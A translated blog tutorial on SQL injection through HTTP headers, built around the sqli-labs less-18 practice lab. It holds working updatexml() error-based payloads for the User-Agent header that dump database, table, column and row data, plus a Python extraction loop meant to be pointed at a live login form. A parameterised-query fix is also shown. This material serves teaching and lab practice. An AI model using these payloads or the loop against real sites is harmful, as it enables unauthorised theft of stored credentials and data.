SQL head injection -- injection principle and essence
2022-07-07 12:24:00 【hcjtn】
SQL header injection
Before getting into header injection, one thing to emphasise:
when you have no source code, you have to try more things during a penetration test.
The essence of SQL injection: data entered by the user is executed as code.
Two conditions must both hold: 1. the user controls the input; 2. the program builds the code it executes by splicing that user input into it.
Every injection flaw starts at a point where a parameter is passed in.
HTTP passes parameters in four places: GET parameters, POST parameters, cookies, and request headers (the values of the header fields).
Header injection is usually triggered at login or when a form is submitted.
One, principle of header injection
Websites record client information that the client hands back (cookies) or that is read from the request headers (client IP, User-Agent, Referer and so on) and store it in a database; wherever that value is spliced into the SQL statement, we have a SQL injection.
Looking at the source of a page that is vulnerable to header injection, the core code contains one extra PHP statement that reads a request header. In sqli-labs less-18 it is:
$uagent = $_SERVER['HTTP_USER_AGENT']; // contents of the current request's User-Agent: header
(less-19 reads $_SERVER['HTTP_REFERER'], the Referer: header, in the same way.)
Other $_SERVER entries are worth knowing too:
$_SERVER['HTTP_ACCEPT_LANGUAGE'] // browser language (Accept-Language: header)
$_SERVER['REMOTE_ADDR'] // IP address of the current client
$_SERVER['REMOTE_HOST'] // host name of the current client
$_SERVER['REQUEST_URI'] // URI that was requested, e.g. /index.php?id=1
$_SERVER['REMOTE_PORT'] // port the client is connecting from
$_SERVER['SERVER_NAME'] // host name of the server
$_SERVER['PHP_SELF'] // file name of the executing script
$_SERVER['argv'] // arguments passed to the script
$_SERVER['argc'] // number of command-line arguments passed to the script
$_SERVER['GATEWAY_INTERFACE'] // version of the CGI specification
$_SERVER['SERVER_SOFTWARE'] // server identification string
$_SERVER['SERVER_PROTOCOL'] // name and version of the protocol the page was requested over
$_SERVER['REQUEST_METHOD'] // request method used to access the page
$_SERVER['QUERY_STRING'] // the query string
$_SERVER['DOCUMENT_ROOT'] // document root under which the current script runs
$_SERVER['HTTP_ACCEPT'] // contents of the current request's Accept: header
$_SERVER['HTTP_ACCEPT_CHARSET'] // contents of the current request's Accept-Charset: header
$_SERVER['HTTP_ACCEPT_ENCODING'] // contents of the current request's Accept-Encoding: header
$_SERVER['HTTP_CONNECTION'] // contents of the current request's Connection: header, e.g. "Keep-Alive"
$_SERVER['HTTP_HOST'] // contents of the current request's Host: header
$_SERVER['HTTP_REFERER'] // URL of the page that linked to the current page (Referer: header)
$_SERVER['HTTP_USER_AGENT'] // contents of the current request's User-Agent: header
$_SERVER['HTTPS'] // set to a non-empty value ("on") when accessed over HTTPS, otherwise "off" or unset
$_SERVER['SCRIPT_FILENAME'] // absolute path name of the currently executing script
$_SERVER['SERVER_ADMIN'] // administrator contact information
$_SERVER['SERVER_PORT'] // port the server is listening on
$_SERVER['SERVER_SIGNATURE'] // string containing the server version and virtual host name
$_SERVER['PATH_TRANSLATED'] // filesystem (not document-root) based path of the current script
$_SERVER['SCRIPT_NAME'] // path of the current script; useful when a page needs to point to itself
$_SERVER['PHP_AUTH_USER'] // when PHP runs as an Apache module and HTTP authentication is in use, the user name entered by the user
$_SERVER['PHP_AUTH_PW'] // when PHP runs as an Apache module and HTTP authentication is in use, the password entered by the user
$_SERVER['AUTH_TYPE'] // when PHP runs as an Apache module and HTTP authentication is in use, the authentication type
Source: $_SERVER Detailed explanation - Brother brush - Blog Garden (cnblogs.com)
Of these, every HTTP_* entry is copied straight from the client's request and is therefore attacker-controlled. REMOTE_ADDR comes from the TCP connection, but code that derives the "client IP" from an X-Forwarded-For or Client-IP header instead is just as injectable.
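As an added example (not the page's or sqli-labs' own code), the following Python script reproduces the splicing described in section one with an in-memory SQLite database standing in for MySQL: the same User-Agent value is logged once by concatenating it into the INSERT, the way the PHP above does, and once with bound parameters. The table layout is borrowed from sqli-labs less-18; the IP address, user name and header value are constructed for the demo.

```python
import sqlite3

# Table shape borrowed from sqli-labs less-18 (uagent, ip_address, username);
# the client IP and user name below are constructed for the demo.
SCHEMA = "CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)"
CLIENT_IP = "203.0.113.5"
USERNAME = "Dumb"

# Constructed User-Agent: closes the first quoted value, supplies the remaining
# two columns itself, closes VALUES(...) and comments out the rest of the statement.
PAYLOAD = "x', '0.0.0.0', 'admin') -- "


def vulnerable_log(conn, user_agent, ip, username):
    """Header spliced straight into the INSERT, as the page's PHP does."""
    sql = ("INSERT INTO uagents (uagent, ip_address, username) "
           "VALUES ('%s', '%s', '%s')" % (user_agent, ip, username))
    conn.execute(sql)  # the header value is now part of the code being run
    return sql


def hardened_log(conn, user_agent, ip, username):
    """Same INSERT with bound parameters: the header is data, never SQL."""
    sql = "INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)"
    conn.execute(sql, (user_agent, ip, username))
    return sql


def logged_rows(conn):
    return conn.execute("SELECT uagent, ip_address, username FROM uagents").fetchall()


def run_demo(user_agent=PAYLOAD):
    """Log the same header through both code paths and return what each stored."""
    results = {}
    for name, log in (("vulnerable", vulnerable_log), ("hardened", hardened_log)):
        conn = sqlite3.connect(":memory:")
        conn.execute(SCHEMA)
        log(conn, user_agent, CLIENT_IP, USERNAME)
        results[name] = logged_rows(conn)
        conn.close()
    return results


if __name__ == "__main__":
    for name, rows in run_demo().items():
        print(name, rows)
```

With the crafted header the vulnerable path stores a row the attacker chose (user name admin, IP 0.0.0.0) and silently drops the real values, while the hardened path stores the header text verbatim. SQLite has no updatexml(), so the error-based extraction the page goes on to describe needs MySQL; the splicing condition it exploits is identical.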
Two, commonly used techniques:
Header injection usually has no echo: the injected value is written into a log table and never displayed, so the query result cannot be read from the page. Use blind injection, or error-based injection (recommended) where the database error is returned to the client. If errors are suppressed, fall back to time-based blind injection (sleep()).
Three, procedure:
The error-based technique with updatexml() (using sqli-labs less-18 as the example):
First capture the login request with Burp Suite. In less-18 the header is stored with INSERT INTO security.uagents (uagent, ip_address, username) VALUES ('$uagent', '$IP', $uname), and the INSERT only runs after a successful login, so log in with valid credentials.
In the captured request, perform error-based injection in the User-Agent: header. Each payload closes the first quoted value, supplies the two remaining columns (,1,1) so the INSERT stays syntactically valid, and comments out the rest of the statement with -- q.
First query the database name:
' and updatexml(1,concat(0x7e,(select database()),0x7e),1),1,1) -- q
Table names:
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1),1,1) -- q
Column names:
' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1),1,1) -- q
Data:
' and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1),1,1) -- q
The value comes back in the response as XPATH syntax error: '~security~'; 0x7e is the ~ marker that delimits it. Step through rows by raising the limit offset (limit 1,1, limit 2,1, ...). updatexml() reports at most 32 characters of the XPath string, so longer values have to be read in pieces with substr().
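The loop a practitioner actually runs against less-18, as an added example that is not part of the original post: it builds the User-Agent payload above with a substr() window to work around the 32-character limit of updatexml() errors, parses the XPATH syntax error out of each response, and concatenates the windows. The send function is a constructed stand-in for the vulnerable page that answers two expressions with sample rows and applies the same truncation; against a live target it would post the login form with the payload in the User-Agent header and return the response body.

```python
import re

# Payload shape from the page: the header value closes the first quoted column of
#   INSERT INTO uagents (uagent, ip_address, username) VALUES ('$uagent', '$IP', $uname)
# and makes updatexml() raise an XPath error that carries the data we want.
# MySQL reports only the first 32 characters of the offending XPath string; with the
# two '~' markers from concat() that leaves 30 characters of data per request.
WINDOW = 30
XPATH_ERR = re.compile(r"XPATH syntax error: '~([^'~]*)")


def build_payload(expr, start=1):
    """User-Agent value leaking WINDOW characters of `expr`, beginning at 1-based `start`."""
    windowed = "substr((%s),%d,%d)" % (expr, start, WINDOW)
    return "' and updatexml(1,concat(0x7e,(%s),0x7e),1),1,1) -- q" % windowed


def parse_error(body):
    """Return the data between the '~' markers, or None if no XPath error came back."""
    m = XPATH_ERR.search(body)
    return m.group(1) if m else None


def extract(expr, send):
    """Slide the substr() window over `expr` until a short window shows the value is complete."""
    value, start = "", 1
    while True:
        chunk = parse_error(send(build_payload(expr, start)))
        if chunk is None:
            return None  # wrong injection point, or the server does not return errors
        value += chunk
        if len(chunk) < WINDOW:
            return value
        start += WINDOW


# Constructed stand-in for the vulnerable page so the loop runs offline: it knows the
# answers to a few expressions and applies MySQL's 32-character truncation.
FAKE_DB = {
    "select database()": "security",
    "select group_concat(username,0x3a,password) from users":
        "Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword",  # constructed sample rows
}
SUBSTR_RE = re.compile(r"substr\(\((.*?)\),(\d+),(\d+)\)")


def fake_send(user_agent):
    m = SUBSTR_RE.search(user_agent)
    if not m or m.group(1) not in FAKE_DB:
        return "<html><body>Welcome Dumb</body></html>"  # no error, nothing leaked
    start, length = int(m.group(2)), int(m.group(3))
    piece = FAKE_DB[m.group(1)][start - 1:start - 1 + length]
    return "XPATH syntax error: '%s'" % ("~" + piece + "~")[:32]


if __name__ == "__main__":
    for expr in FAKE_DB:
        print(expr, "->", extract(expr, fake_send))
```

The termination test relies on the window being 30: a full 30-character window plus both markers is exactly the 32 characters MySQL shows, so a shorter window (or an empty one when the value length is a multiple of 30) means the end has been reached. A None result means the injection point or the error echo is wrong, which is the cue to switch to the blind techniques from section two.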